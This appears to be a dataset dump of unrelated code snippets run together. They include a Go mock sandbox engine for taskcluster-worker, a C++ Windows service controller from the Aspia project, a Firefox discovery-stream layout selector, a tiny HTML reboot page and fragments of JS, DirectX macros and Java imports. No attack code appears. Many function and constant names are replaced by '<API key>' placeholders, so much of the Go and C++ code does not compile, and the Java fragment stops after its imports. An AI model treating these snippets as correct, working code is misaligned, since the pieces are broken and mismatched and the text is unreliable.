answer stringlengths 15 1.25M |
|---|
colorPicker.on('color:change', function(color) {
// don't let the color saturation fall below 50!
if (color.saturation < 50) {
color.saturation = 50;
}
}); |
package mockengine
import (
"bytes"
"fmt"
"io"
"net/http"
"net/http/httptest"
"net/url"
"strings"
"sync"
"time"
"github.com/taskcluster/taskcluster-worker/engines"
"github.com/taskcluster/taskcluster-worker/runtime"
"github.com/taskcluster/taskcluster-worker/runtime/atomics"
"github.com/taskcluster/taskcluster-worker/runtime/ioext"
)
// mount pairs a volume with its mount options for a single mountpoint
// inside the mock sandbox.
type mount struct {
	volume   *volume
	readOnly bool
}
// In this example it is easier to just implement with one object.
// This way we won't have to pass data between different instances.
// In larger more complex engines that downloads stuff, etc. it's probably not
// a good idea to implement everything in one structure.
// sandbox implements SandboxBuilder, Sandbox and ResultSet in a single
// struct, guarded by the embedded mutex. This is only reasonable because
// the mock engine is trivial; see the note above.
type sandbox struct {
	sync.Mutex
	engines.SandboxBuilderBase
	engines.SandboxBase
	engines.ResultSetBase
	environment runtime.Environment
	payload     payloadType
	context     *runtime.TaskContext
	// Builder state, populated before StartSandbox.
	env     map[string]string
	mounts  map[string]*mount
	proxies map[string]http.Handler
	// files holds the paths written by the "write-files" task function,
	// later served by ExtractFile/ExtractFolder.
	files map[string][]byte
	// sessions tracks open shells/displays; the sandbox does not resolve
	// until they are all closed (or drained by Kill/Abort).
	sessions atomics.WaitGroup
	shells   []engines.Shell
	displays []io.ReadWriteCloser
	// resolve guarantees the result fields below are written exactly once.
	resolve   atomics.Once
	result    bool
	resultErr error
	abortErr  error
}
////////////////////////// Implementation of SandboxBuilder interface
// abortSessions drains the session wait-group and forcibly terminates
// every interactive session (shells and displays) attached to the
// sandbox, unblocking the WaitAndDrain call in StartSandbox.
func (s *sandbox) abortSessions() {
	s.Lock()
	defer s.Unlock()
	// Drain prevents new sessions from being added while we tear down.
	s.sessions.Drain()
	for _, shell := range s.shells {
		shell.Abort()
	}
	for _, display := range s.displays {
		display.Close()
	}
}
// StartSandbox asynchronously executes the function named in the payload
// (after the configured delay) and resolves the sandbox with its result
// once every interactive session has ended.
func (s *sandbox) StartSandbox() (engines.Sandbox, error) {
	s.Lock()
	defer s.Unlock()
	go func() {
		// No need to lock access to payload, as it can't be mutated at this point
		time.Sleep(time.Duration(s.payload.Delay) * time.Millisecond)
		// No need to lock access mounts and proxies either
		f := functions[s.payload.Function]
		var err error
		var result bool
		if f == nil {
			err = runtime.<API key>("Unknown function")
		} else {
			result, err = f(s, s.payload.Argument)
		}
		// Block until all shells/displays are closed before resolving,
		// so interactive sessions can outlive the task function.
		s.sessions.WaitAndDrain()
		s.resolve.Do(func() {
			s.result = result
			s.resultErr = err
			s.abortErr = engines.<API key>
		})
	}()
	return s, nil
}
// AttachVolume mounts v at mountpoint, optionally read-only. It returns a
// malformed-payload error when the mountpoint contains a space, and
// ErrNamingConflict when the mountpoint is already taken.
func (s *sandbox) AttachVolume(mountpoint string, v engines.Volume, readOnly bool) error {
	// We can type cast Volume to our internal type as we know the volume was
	vol, valid := v.(*volume)
	if !valid {
		// TODO: Write to some sort of log if the type assertion fails
		return fmt.Errorf("invalid volume type")
	}
	// Lock before we access mounts as this method may be called concurrently
	s.Lock()
	defer s.Unlock()
	if strings.ContainsAny(mountpoint, " ") {
		return runtime.<API key>("MockEngine mountpoints cannot contain space")
	}
	if s.mounts[mountpoint] != nil {
		return engines.ErrNamingConflict
	}
	s.mounts[mountpoint] = &mount{
		volume:   vol,
		readOnly: readOnly,
	}
	return nil
}
// AttachProxy registers an http.Handler under the given proxy name, later
// reachable through the "ping-proxy" task function. Names containing a
// space are rejected; duplicates yield ErrNamingConflict.
func (s *sandbox) AttachProxy(name string, handler http.Handler) error {
	// Lock before we access proxies as this method may be called concurrently
	s.Lock()
	defer s.Unlock()
	if strings.ContainsAny(name, " ") {
		return runtime.<API key>(
			"MockEngine proxy names cannot contain space.",
			"Was given proxy name: '", name, "' which isn't allowed!",
		)
	}
	if s.proxies[name] != nil {
		return engines.ErrNamingConflict
	}
	s.proxies[name] = handler
	return nil
}
// Records an environment variable for the mock task, later readable via
// the "print-env-var" task function. Space-containing names are rejected
// as malformed payloads; redefining a name yields ErrNamingConflict.
func (s *sandbox) <API key>(name string, value string) error {
	s.Lock()
	defer s.Unlock()
	if strings.Contains(name, " ") {
		return runtime.<API key>(
			"MockEngine environment variable names cannot contain space.",
			"Was given environment variable name: '", name, "' which isn't allowed!",
		)
	}
	if _, ok := s.env[name]; ok {
		return engines.ErrNamingConflict
	}
	s.env[name] = value
	return nil
}
////////////////////////// Implementation of Sandbox interface
// List of functions implementing the task.payload.start.function functionality.
var functions = map[string]func(*sandbox, string) (bool, error){
	// Trivial success/failure results, independent of the argument.
	"true":  func(s *sandbox, arg string) (bool, error) { return true, nil },
	"false": func(s *sandbox, arg string) (bool, error) { return false, nil },
	// Writes fileData to a previously attached writable volume.
	"write-volume": func(s *sandbox, arg string) (bool, error) {
		// Parse arg as: <mountPoint>/<file_name>:<fileData>
		args := strings.SplitN(arg, "/", 2)
		volumeName := args[0]
		args = strings.SplitN(args[1], ":", 2)
		fileName := args[0]
		fileData := args[1]
		mount := s.mounts[volumeName]
		// Fail (without error) if the volume is absent or read-only.
		if mount == nil || mount.readOnly {
			return false, nil
		}
		mount.volume.files[fileName] = fileData
		return true, nil
	},
	// Logs a file from an attached volume; succeeds if it is non-empty.
	"read-volume": func(s *sandbox, arg string) (bool, error) {
		// Parse arg as: <mountPoint>/<fileName>
		args := strings.SplitN(arg, "/", 2)
		volumeName := args[0]
		fileName := args[1]
		mount := s.mounts[volumeName]
		if mount == nil {
			return false, nil
		}
		s.context.Log(mount.volume.files[fileName])
		return mount.volume.files[fileName] != "", nil
	},
	// Fetches arg as a URL, streaming the body into the task log.
	"get-url": func(s *sandbox, arg string) (bool, error) {
		res, err := http.Get(arg)
		if err != nil {
			s.context.Log("Failed to get url: ", arg, " err: ", err)
			return false, nil
		}
		defer res.Body.Close()
		io.Copy(s.context.LogDrain(), res.Body)
		return res.StatusCode == http.StatusOK, nil
	},
	// Routes a synthetic GET request through the proxy registered for the
	// URL's hostname (see AttachProxy) and logs the response.
	"ping-proxy": func(s *sandbox, arg string) (bool, error) {
		u, err := url.Parse(arg)
		if err != nil {
			s.context.Log("Failed to parse url: ", arg, " got error: ", err)
			return false, nil
		}
		handler := s.proxies[u.Host]
		if handler == nil {
			s.context.Log("No proxy for hostname: ", u.Host, " in: ", arg)
			return false, nil
		}
		// Make a fake HTTP request and http response recorder
		s.context.Log("Pinging")
		req, err := http.NewRequest("GET", arg, nil)
		if err != nil {
			// Only reachable with an unparsable URL, which was checked above.
			panic(err)
		}
		w := httptest.NewRecorder()
		handler.ServeHTTP(w, req)
		// Log response
		s.context.Log(w.Body.String())
		return w.Code == http.StatusOK, nil
	},
	// Log arg and succeed / fail / succeed-after-sleeping, respectively.
	"write-log": func(s *sandbox, arg string) (bool, error) {
		s.context.Log(arg)
		return true, nil
	},
	"write-error-log": func(s *sandbox, arg string) (bool, error) {
		s.context.Log(arg)
		return false, nil
	},
	"write-log-sleep": func(s *sandbox, arg string) (bool, error) {
		s.context.Log(arg)
		time.Sleep(500 * time.Millisecond)
		return true, nil
	},
	// Creates a dummy file at every space-separated path in arg, which can
	// later be retrieved with ExtractFile/ExtractFolder.
	"write-files": func(s *sandbox, arg string) (bool, error) {
		for _, path := range strings.Split(arg, " ") {
			s.files[path] = []byte("Hello World")
		}
		return true, nil
	},
	// Logs the value of the environment variable named by arg; succeeds
	// only if the variable was set.
	"print-env-var": func(s *sandbox, arg string) (bool, error) {
		val, ok := s.env[arg]
		s.context.Log(val)
		return ok, nil
	},
	"<API key>": func(s *sandbox, arg string) (bool, error) {
		// Should normally only be used if error is reported with Monitor
		return false, runtime.<API key>
	},
	"<API key>": func(s *sandbox, arg string) (bool, error) {
		// Should normally only be used if error is reported with Monitor
		return false, runtime.<API key>
	},
	"<API key>": func(s *sandbox, arg string) (bool, error) {
		return false, runtime.<API key>(s.payload.Argument)
	},
	// Asks the worker to stop immediately, then lingers briefly.
	"stopNow-sleep": func(s *sandbox, arg string) (bool, error) {
		// This is not really a reasonable thing for an engine to do. But it's
		// useful for testing... StopNow causes all running tasks to be resolved
		// 'exception' with reason: 'worker-shutdown'.
		s.environment.Worker.StopNow()
		time.Sleep(500 * time.Millisecond)
		return true, nil
	},
}
// WaitForResult blocks until the sandbox has been resolved, then returns
// the sandbox itself as the result set, or the error it resolved with.
func (s *sandbox) WaitForResult() (engines.ResultSet, error) {
	// Block until StartSandbox's goroutine (or Kill/Abort) resolves us.
	s.resolve.Wait()
	if err := s.resultErr; err != nil {
		return nil, err
	}
	return s, nil
}
// Kill forcibly terminates the sandbox: it aborts all interactive
// sessions and resolves the task as unsuccessful. Only the first
// resolver wins; a later Kill is a no-op that just waits and reports.
// NOTE(review): Kill returns resultErr while Abort returns abortErr —
// confirm this asymmetry is intended.
func (s *sandbox) Kill() error {
	s.resolve.Do(func() {
		s.abortSessions()
		s.result = false
		s.abortErr = engines.<API key>
	})
	// Wait in case another goroutine is mid-resolution.
	s.resolve.Wait()
	return s.resultErr
}
// Abort cancels the sandbox: it terminates all interactive sessions and
// resolves with ErrSandboxAborted. If the sandbox was already resolved,
// the abortErr set by that resolution is returned instead.
func (s *sandbox) Abort() error {
	s.resolve.Do(func() {
		s.abortSessions()
		s.result = false
		s.resultErr = engines.ErrSandboxAborted
	})
	// Wait in case another goroutine is mid-resolution.
	s.resolve.Wait()
	return s.abortErr
}
// NewShell opens a mock shell session. The mock engine only supports the
// default shell: any explicit command or TTY request is rejected. Fails
// once the sandbox has resolved (the session wait-group is drained).
func (s *sandbox) NewShell(command []string, tty bool) (engines.Shell, error) {
	s.Lock()
	defer s.Unlock()
	if len(command) > 0 || tty {
		return nil, engines.<API key>
	}
	// Add(1) fails after Drain(), i.e. once the sandbox resolved/aborted.
	if s.sessions.Add(1) != nil {
		return nil, engines.<API key>
	}
	shell := newShell()
	s.shells = append(s.shells, shell)
	go func() {
		// Release the session slot when the shell terminates, allowing
		// StartSandbox's WaitAndDrain to proceed.
		shell.Wait()
		s.sessions.Done()
	}()
	return shell, nil
}
// ListDisplays returns the single static display offered by the mock
// engine.
func (s *sandbox) ListDisplays() ([]engines.Display, error) {
	return []engines.Display{
		{
			Name:        "MockDisplay",
			Description: "Simple mock VNC display rendering a static test image",
			Width:       mockDisplayWidth,
			Height:      mockDisplayHeight,
		},
	}, nil
}
// OpenDisplay opens a stream to the named display. Only "MockDisplay"
// exists. The stream counts as a session, so the sandbox will not
// resolve while it remains open.
func (s *sandbox) OpenDisplay(name string) (io.ReadWriteCloser, error) {
	s.Lock()
	defer s.Unlock()
	if name != "MockDisplay" {
		return nil, engines.ErrNoSuchDisplay
	}
	// Add(1) fails once the sandbox has resolved (wait-group drained).
	if s.sessions.Add(1) != nil {
		return nil, engines.<API key>
	}
	// Release the session slot when the pipe is closed or errors out.
	d := ioext.WatchPipe(newMockDisplay(), func(error) {
		s.sessions.Done()
	})
	s.displays = append(s.displays, d)
	return d, nil
}
////////////////////////// Implementation of ResultSet interface
// ExtractFile returns a reader over the bytes previously stored at path
// by the "write-files" task function. Missing or empty files are both
// reported as ErrResourceNotFound, matching the original behavior.
func (s *sandbox) ExtractFile(path string) (ioext.ReadSeekCloser, error) {
	content, ok := s.files[path]
	if !ok || len(content) == 0 {
		return nil, engines.ErrResourceNotFound
	}
	reader := bytes.NewReader(content)
	return ioext.NopCloser(reader), nil
}
// ExtractFolder invokes handler concurrently for every stored file whose
// path lies under folder, passing paths relative to the folder. Returns
// ErrResourceNotFound if nothing matched, and ErrHandlerInterrupt if any
// handler invocation returned an error.
func (s *sandbox) ExtractFolder(folder string, handler engines.FileHandler) error {
	// Normalize so the prefix match below operates on whole path segments.
	if !strings.HasSuffix(folder, "/") {
		folder += "/"
	}
	wg := sync.WaitGroup{}
	m := sync.Mutex{}
	handlerError := false
	foundFolder := false
	for p, data := range s.files {
		if strings.HasPrefix(p, folder) {
			foundFolder = true
			wg.Add(1)
			go func(p string, data []byte) {
				p = p[len(folder):] // Note: folder always ends with slash
				err := handler(p, ioext.NopCloser(bytes.NewReader(data)))
				if err != nil {
					// Guard the shared flag; handlers run concurrently.
					m.Lock()
					handlerError = true
					m.Unlock()
				}
				wg.Done()
			}(p, data)
		}
	}
	wg.Wait()
	if !foundFolder {
		return engines.ErrResourceNotFound
	}
	if handlerError {
		return engines.ErrHandlerInterrupt
	}
	return nil
}
// Success reports whether the mock task function returned true. Only
// meaningful after the sandbox has resolved (see WaitForResult).
func (s *sandbox) Success() bool {
	// No need to lock access as result is immutable
	return s.result
}
<!DOCTYPE HTML PUBLIC "-//W3C//DTD W3 HTML//EN">
<html>
<head>
<title>DLP Control</title>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
</head>
<body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0"
bgcolor="#FFFFFF" fgcolor="#009900" link="#009933" vlink="#009933"
alink="#006666">
<br><br>
<center>
<table border="0" width="65%" cellspacing="0" cellpadding="3">
<tr>
<th colspan="2" style="background-color:#009933;color:white">Rabbit Semiconductor Download Manager</th>
</tr>
<tr>
<td style="background-color:#CCCCCC;color:black">Exit this program and reboot Download Manager</td>
<td style="background-color:#CCCCCC;color:black"><a href="/reboot.cgi">Reboot</a></td>
</tr>
</table>
</body>
</html>
// Aspia Project
// This program is free software: you can redistribute it and/or modify
// (at your option) any later version.
// This program is distributed in the hope that it will be useful,
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#include "base/service_controller.h"
#include <memory>
#include "base/logging.h"
namespace base {
ServiceController::ServiceController() = default;

// Takes ownership of both raw handles; they are wrapped in scoped
// handles that close them automatically on destruction.
ServiceController::ServiceController(SC_HANDLE sc_manager, SC_HANDLE service)
    : sc_manager_(sc_manager),
      service_(service)
{
    // Nothing
}

// Move construction/assignment transfer handle ownership; the moved-from
// object is left holding no handles.
ServiceController::ServiceController(ServiceController&& other) noexcept
    : sc_manager_(std::move(other.sc_manager_)),
      service_(std::move(other.service_))
{
    // Nothing
}

ServiceController& ServiceController::operator=(ServiceController&& other) noexcept
{
    sc_manager_ = std::move(other.sc_manager_);
    service_ = std::move(other.service_);
    return *this;
}

ServiceController::~ServiceController() = default;
// static
// static
// Opens an existing service by name. On failure a default-constructed
// (invalid) controller is returned; callers should check isValid().
ServiceController ServiceController::open(const QString& name)
{
    win::ScopedScHandle sc_manager(OpenSCManagerW(nullptr, nullptr, <API key>));
    if (!sc_manager.isValid())
    {
        PLOG(LS_WARNING) << "OpenSCManagerW failed";
        return ServiceController();
    }

    win::ScopedScHandle service(OpenServiceW(sc_manager,
                                             qUtf16Printable(name),
                                             SERVICE_ALL_ACCESS));
    if (!service.isValid())
    {
        PLOG(LS_WARNING) << "OpenServiceW failed";
        return ServiceController();
    }

    return ServiceController(sc_manager.release(), service.release());
}
// static
// static
// Creates an auto-start service for the given binary and configures it
// to restart automatically after a crash. Returns an invalid controller
// on any failure.
ServiceController ServiceController::install(const QString& name,
                                             const QString& display_name,
                                             const QString& file_path)
{
    win::ScopedScHandle sc_manager(OpenSCManagerW(nullptr, nullptr, <API key>));
    if (!sc_manager.isValid())
    {
        PLOG(LS_WARNING) << "OpenSCManagerW failed";
        return ServiceController();
    }

    // The SCM expects a native (backslash-separated) binary path.
    QString <API key> = file_path;
    <API key>.replace(QLatin1Char('/'), QLatin1Char('\\'));

    win::ScopedScHandle service(CreateServiceW(sc_manager,
                                               qUtf16Printable(name),
                                               qUtf16Printable(display_name),
                                               SERVICE_ALL_ACCESS,
                                               <API key>,
                                               SERVICE_AUTO_START,
                                               <API key>,
                                               qUtf16Printable(<API key>),
                                               nullptr,
                                               nullptr,
                                               nullptr,
                                               nullptr,
                                               nullptr));
    if (!service.isValid())
    {
        PLOG(LS_WARNING) << "CreateServiceW failed";
        return ServiceController();
    }

    // Single recovery action: restart the service one minute after failure.
    SC_ACTION action;
    action.Type = SC_ACTION_RESTART;
    action.Delay = 60000; // 60 seconds

    <API key> actions;
    actions.dwResetPeriod = 0;
    actions.lpRebootMsg = nullptr;
    actions.lpCommand = nullptr;
    actions.cActions = 1;
    actions.lpsaActions = &action;

    if (!<API key>(service, <API key>, &actions))
    {
        PLOG(LS_WARNING) << "<API key> failed";
        return ServiceController();
    }

    return ServiceController(sc_manager.release(), service.release());
}
// static
// static
// Marks the named service for deletion and polls until the SCM actually
// removes it (deletion is deferred until all handles are closed).
// Returns false on failure or if the service is still present after all
// attempts.
bool ServiceController::remove(const QString& name)
{
    win::ScopedScHandle sc_manager(OpenSCManagerW(nullptr, nullptr, <API key>));
    if (!sc_manager.isValid())
    {
        PLOG(LS_WARNING) << "OpenSCManagerW failed";
        return false;
    }

    win::ScopedScHandle service(OpenServiceW(sc_manager,
                                             qUtf16Printable(name),
                                             SERVICE_ALL_ACCESS));
    if (!service.isValid())
    {
        PLOG(LS_WARNING) << "OpenServiceW failed";
        return false;
    }

    if (!DeleteService(service))
    {
        PLOG(LS_WARNING) << "DeleteService failed";
        return false;
    }

    // Close our handles so the pending deletion can complete.
    service.reset();
    sc_manager.reset();

    static const int kMaxAttempts = 15;
    static const int kAttemptInterval = 100; // milliseconds

    for (int i = 0; i < kMaxAttempts; ++i)
    {
        if (!isInstalled(name))
            return true;
        Sleep(kAttemptInterval);
    }

    return false;
}
// static
// static
// Returns true if a service with the given name exists. Unexpected
// OpenServiceW failures (anything other than "not found") are logged
// but still reported as not installed.
bool ServiceController::isInstalled(const QString& name)
{
    win::ScopedScHandle sc_manager(OpenSCManagerW(nullptr, nullptr, SC_MANAGER_CONNECT));
    if (!sc_manager.isValid())
    {
        PLOG(LS_WARNING) << "OpenSCManagerW failed";
        return false;
    }

    win::ScopedScHandle service(OpenServiceW(sc_manager,
                                             qUtf16Printable(name),
                                             <API key>));
    if (!service.isValid())
    {
        if (GetLastError() != <API key>)
        {
            PLOG(LS_WARNING) << "OpenServiceW failed";
        }
        return false;
    }

    return true;
}
// Releases both handles, invalidating the controller. The service handle
// is closed before the manager handle that owns it.
void ServiceController::close()
{
    service_.reset();
    sc_manager_.reset();
}
bool ServiceController::setDescription(const QString& description)
{
<API key> service_description;
service_description.lpDescription = const_cast<LPWSTR>(qUtf16Printable(description));
// Set the service description.
if (!<API key>(service_, <API key>, &service_description))
{
PLOG(LS_WARNING) << "<API key> failed";
return false;
}
return true;
}
// Returns the service's description string, or an empty QString on error
// or when no description is set. Uses the usual two-call Win32 pattern:
// probe for the required buffer size, then fetch into it.
QString ServiceController::description() const
{
    DWORD bytes_needed = 0;

    // The probing call is expected to fail with an insufficient-buffer
    // error; success or any other error is unexpected here.
    if (<API key>(service_, <API key>, nullptr, 0, &bytes_needed) ||
        GetLastError() != <API key>)
    {
        LOG(LS_FATAL) << "<API key>: unexpected result";
        return QString();
    }

    if (!bytes_needed)
        return QString();

    std::unique_ptr<uint8_t[]> buffer = std::make_unique<uint8_t[]>(bytes_needed);

    if (!<API key>(service_, <API key>, buffer.get(), bytes_needed,
                   &bytes_needed))
    {
        PLOG(LS_WARNING) << "<API key> failed";
        return QString();
    }

    SERVICE_DESCRIPTION* service_description =
        reinterpret_cast<SERVICE_DESCRIPTION*>(buffer.get());
    if (!service_description->lpDescription)
        return QString();

    return QString::fromUtf16(reinterpret_cast<const ushort*>(service_description->lpDescription));
}
// Replaces the service's dependency list. The list is serialized as a
// REG_MULTI_SZ-style double-NUL-terminated sequence of UTF-16 strings,
// which is what ChangeServiceConfigW expects for lpDependencies.
bool ServiceController::setDependencies(const QStringList& dependencies)
{
    QByteArray buffer;

    for (auto it = dependencies.constBegin(); it != dependencies.constEnd(); ++it)
    {
        const QString& str = *it;
        // Copy each string including its trailing NUL character (+1).
        buffer += QByteArray(reinterpret_cast<const char*>(str.utf16()),
                             (str.length() + 1) * sizeof(wchar_t));
    }

    // One extra wide NUL (two bytes) terminates the whole multi-string.
    buffer.append(static_cast<char>(0));
    buffer.append(static_cast<char>(0));

    if (!<API key>(service_,
                   SERVICE_NO_CHANGE,
                   SERVICE_NO_CHANGE,
                   SERVICE_NO_CHANGE,
                   nullptr, nullptr, nullptr,
                   reinterpret_cast<const wchar_t*>(buffer.data()),
                   nullptr, nullptr, nullptr))
    {
        PLOG(LS_WARNING) << "<API key> failed";
        return false;
    }

    return true;
}
// Returns the service's dependency names, parsed from the
// double-NUL-terminated multi-string in the queried service config.
// Returns an empty list on error or when there are no dependencies.
QStringList ServiceController::dependencies() const
{
    DWORD bytes_needed = 0;

    // Size-probing call; expected to fail with an insufficient-buffer error.
    if (QueryServiceConfigW(service_, nullptr, 0, &bytes_needed) ||
        GetLastError() != <API key>)
    {
        LOG(LS_FATAL) << "QueryServiceConfigW: unexpected result";
        return QStringList();
    }

    if (!bytes_needed)
        return QStringList();

    std::unique_ptr<uint8_t[]> buffer = std::make_unique<uint8_t[]>(bytes_needed);
    <API key>* service_config = reinterpret_cast<<API key>*>(buffer.get());

    if (!QueryServiceConfigW(service_, service_config, bytes_needed, &bytes_needed))
    {
        PLOG(LS_WARNING) << "QueryServiceConfigW failed";
        return QStringList();
    }

    if (!service_config->lpDependencies)
        return QStringList();

    QStringList list;
    size_t len = 0;

    // Walk the multi-string: each entry is NUL-terminated, and an empty
    // entry marks the end of the list.
    for (;;)
    {
        QString str = QString::fromWCharArray(service_config->lpDependencies + len);
        len += str.length() + 1;
        if (str.isEmpty())
            break;
        list.append(str);
    }

    return list;
}
// Returns the service's binary path as configured in the SCM, or an
// empty QString on error.
QString ServiceController::filePath() const
{
    DWORD bytes_needed = 0;

    // Size-probing call; expected to fail with an insufficient-buffer error.
    if (QueryServiceConfigW(service_, nullptr, 0, &bytes_needed) ||
        GetLastError() != <API key>)
    {
        LOG(LS_FATAL) << "QueryServiceConfigW: unexpected result";
        return QString();
    }

    if (!bytes_needed)
        return QString();

    std::unique_ptr<uint8_t[]> buffer = std::make_unique<uint8_t[]>(bytes_needed);
    <API key>* service_config = reinterpret_cast<<API key>*>(buffer.get());

    if (!QueryServiceConfigW(service_, service_config, bytes_needed, &bytes_needed))
    {
        PLOG(LS_WARNING) << "QueryServiceConfigW failed";
        return QString();
    }

    if (!service_config->lpBinaryPathName)
        return QString();

    return QString::fromUtf16(reinterpret_cast<const ushort*>(service_config->lpBinaryPathName));
}
// Returns true when both the SCM and the service handle are open.
bool ServiceController::isValid() const
{
    return sc_manager_.isValid() && service_.isValid();
}
// Returns true unless the service is fully stopped. Note that transient
// states (start/stop pending, paused) are all reported as "running".
bool ServiceController::isRunning() const
{
    SERVICE_STATUS status;

    if (!QueryServiceStatus(service_, &status))
    {
        PLOG(LS_WARNING) << "QueryServiceStatus failed";
        return false;
    }

    return status.dwCurrentState != SERVICE_STOPPED;
}
// Asks the SCM to start the service. Returns false (and logs) on failure.
bool ServiceController::start()
{
    const bool started = !!StartServiceW(service_, 0, nullptr);
    if (!started)
        PLOG(LS_WARNING) << "StartServiceW failed";
    return started;
}
// Sends a stop control to the service, then polls (up to ~15 * 250 ms)
// until it reports SERVICE_STOPPED. Returns whether the service actually
// stopped within that window.
bool ServiceController::stop()
{
    SERVICE_STATUS status;

    if (!ControlService(service_, <API key>, &status))
    {
        PLOG(LS_WARNING) << "ControlService failed";
        return false;
    }

    bool is_stopped = status.dwCurrentState == SERVICE_STOPPED;
    int number_of_attempts = 0;

    while (!is_stopped && number_of_attempts < 15)
    {
        Sleep(250);

        if (!QueryServiceStatus(service_, &status))
            break;

        is_stopped = status.dwCurrentState == SERVICE_STOPPED;
        ++number_of_attempts;
    }

    return is_stopped;
}
} // namespace base |
#define WIN32_LEAN_AND_MEAN
#define DX_INIT_STRUCT(ddstruct) {memset(&ddstruct, 0, sizeof(ddstruct)); ddstruct.dwSize = sizeof(ddstruct);}
#define DX_REMOVE(dxo) {if(dxo) dxo->Release(); dxo = NULL;} |
// Selects and renders the discovery-stream layout: merges feed data into
// each layout component, probabilistically inserts sponsored content
// ("spocs"), and produces the payload for the SPOCS Fill telemetry ping.
//
// BUG FIX: the object/array spread operators (`...`) had been stripped
// throughout this function, producing syntax errors (e.g. `{ feed.data, ... }`)
// and wrong shapes (nested objects/arrays instead of merged ones). They are
// restored below. Redacted local identifiers were given descriptive names.
export const selectLayoutRender = (state, prefs, rickRollCache) => {
  const { layout, feeds, spocs } = state;
  let spocIndex = 0;
  let bufferRollCache = [];
  // Records the chosen and unchosen spocs by the probability selection.
  let chosenSpocs = new Set();
  let unchosenSpocs = new Set();

  // Probabilistically splice spocs into a copy of data.recommendations at
  // the configured positions. Consumes cached rolls when available.
  function rollForSpocs(data, spocsConfig) {
    const recommendations = [...data.recommendations];
    for (let position of spocsConfig.positions) {
      const spoc = spocs.data.spocs[spocIndex];
      if (!spoc) {
        break;
      }
      // Cache random number for a position
      let rickRoll;
      if (!rickRollCache.length) {
        rickRoll = Math.random();
        bufferRollCache.push(rickRoll);
      } else {
        rickRoll = rickRollCache.shift();
        bufferRollCache.push(rickRoll);
      }
      if (rickRoll <= spocsConfig.probability) {
        spocIndex++;
        recommendations.splice(position.index, 0, spoc);
        chosenSpocs.add(spoc);
      } else {
        unchosenSpocs.add(spoc);
      }
    }
    return {
      ...data,
      recommendations,
    };
  }

  // Tracks the next item position per component type, so multiple
  // components of the same type number their items sequentially.
  const positions = {};
  // Discovery-stream component types hidden when topstories is disabled.
  const DS_COMPONENTS = [
    "Message",
    "SectionTitle",
    "Navigation",
    "CardGrid",
    "Hero",
    "HorizontalRule",
    "List",
  ];

  const filterArray = [];

  if (!prefs["feeds.topsites"]) {
    filterArray.push("TopSites");
  }

  if (!prefs["feeds.section.topstories"]) {
    filterArray.push(...DS_COMPONENTS);
  }

  // Returns the component with placeholder recommendations, used while
  // its feed/spocs are still loading.
  const handleComponentWithoutFeed = component => {
    const data = {
      recommendations: [],
    };

    let items = 0;
    if (component.properties && component.properties.items) {
      items = component.properties.items;
    }
    for (let i = 0; i < items; i++) {
      data.recommendations.push({ placeholder: true });
    }

    return { ...component, data };
  };

  // Merges feed data (and possibly spocs) into a component, applying the
  // configured offset/items limits and sequential item positions.
  const handleComponent = component => {
    positions[component.type] = positions[component.type] || 0;

    const feed = feeds.data[component.feed.url];

    let data = {
      recommendations: [],
    };

    if (feed && feed.data) {
      data = {
        ...feed.data,
        recommendations: [...(feed.data.recommendations || [])],
      };
    }

    if (component && component.properties && component.properties.offset) {
      data = {
        ...data,
        recommendations: data.recommendations.slice(
          component.properties.offset
        ),
      };
    }

    // Ensure we have recs available for this feed.
    const hasRecs = data && data.recommendations;

    // Do we ever expect to possibly have a spoc.
    if (
      hasRecs &&
      component.spocs &&
      component.spocs.positions &&
      component.spocs.positions.length
    ) {
      // We expect a spoc, spocs are loaded, and the server returned spocs.
      if (spocs.loaded && spocs.data.spocs && spocs.data.spocs.length) {
        data = rollForSpocs(data, component.spocs);
      }
    }

    let items = 0;
    if (component.properties && component.properties.items) {
      items = Math.min(component.properties.items, data.recommendations.length);
    }

    // loop through a component items
    // Store the items position sequentially for multiple components of the same type.
    // Example: A second card grid starts pos offset from the last card grid.
    for (let i = 0; i < items; i++) {
      data.recommendations[i] = {
        ...data.recommendations[i],
        pos: positions[component.type]++,
      };
    }

    return { ...component, data };
  };

  // Renders rows/components, skipping filtered types. Bails out early with
  // a placeholder as soon as a component's feed or spocs are not loaded.
  const renderLayout = () => {
    const renderedLayoutArray = [];
    for (const row of layout.filter(
      r => r.components.filter(c => !filterArray.includes(c.type)).length
    )) {
      let components = [];
      renderedLayoutArray.push({
        ...row,
        components,
      });
      for (const component of row.components.filter(
        c => !filterArray.includes(c.type)
      )) {
        if (component.feed) {
          const spocsConfig = component.spocs;
          // Are we still waiting on a feed/spocs, render what we have,
          // add a placeholder for this component, and bail out early.
          if (
            !feeds.data[component.feed.url] ||
            (spocsConfig &&
              spocsConfig.positions &&
              spocsConfig.positions.length &&
              !spocs.loaded)
          ) {
            components.push(handleComponentWithoutFeed(component));
            return renderedLayoutArray;
          }
          components.push(handleComponent(component));
        } else {
          components.push(component);
        }
      }
    }
    return renderedLayoutArray;
  };

  const layoutRender = renderLayout();

  // If empty, fill rickRollCache with random probability values from bufferRollCache
  if (!rickRollCache.length) {
    rickRollCache.push(...bufferRollCache);
  }

  // Generate the payload for the SPOCS Fill ping. Note that a SPOC could be rejected
  // by the probability selection first, then gets chosen for the next position. For
  // all other SPOCS that never went through the probabilistic selection, its reason will
  // be "out_of_position".
  let spocsFill = [];
  if (spocs.loaded && feeds.loaded && spocs.data.spocs) {
    const chosenSpocsFill = [...chosenSpocs].map(spoc => ({
      id: spoc.id,
      reason: "n/a",
      displayed: 1,
      full_recalc: 0,
    }));
    const unchosenSpocsFill = [...unchosenSpocs]
      .filter(spoc => !chosenSpocs.has(spoc))
      .map(spoc => ({
        id: spoc.id,
        reason: "<API key>",
        displayed: 0,
        full_recalc: 0,
      }));
    const outOfPositionSpocsFill = spocs.data.spocs
      .slice(spocIndex)
      .filter(spoc => !unchosenSpocs.has(spoc))
      .map(spoc => ({
        id: spoc.id,
        reason: "out_of_position",
        displayed: 0,
        full_recalc: 0,
      }));

    // Flatten the three categories into a single fill list.
    spocsFill = [
      ...chosenSpocsFill,
      ...unchosenSpocsFill,
      ...outOfPositionSpocsFill,
    ];
  }

  return { spocsFill, layoutRender };
};
package org.oasis_open.docs.wsn.b_2;
import java.util.ArrayList;
import java.util.List;
import javax.xml.bind.annotation.XmlAccessType;
import javax.xml.bind.annotation.XmlAccessorType;
import javax.xml.bind.annotation.XmlAnyElement;
import javax.xml.bind.annotation.XmlRootElement;
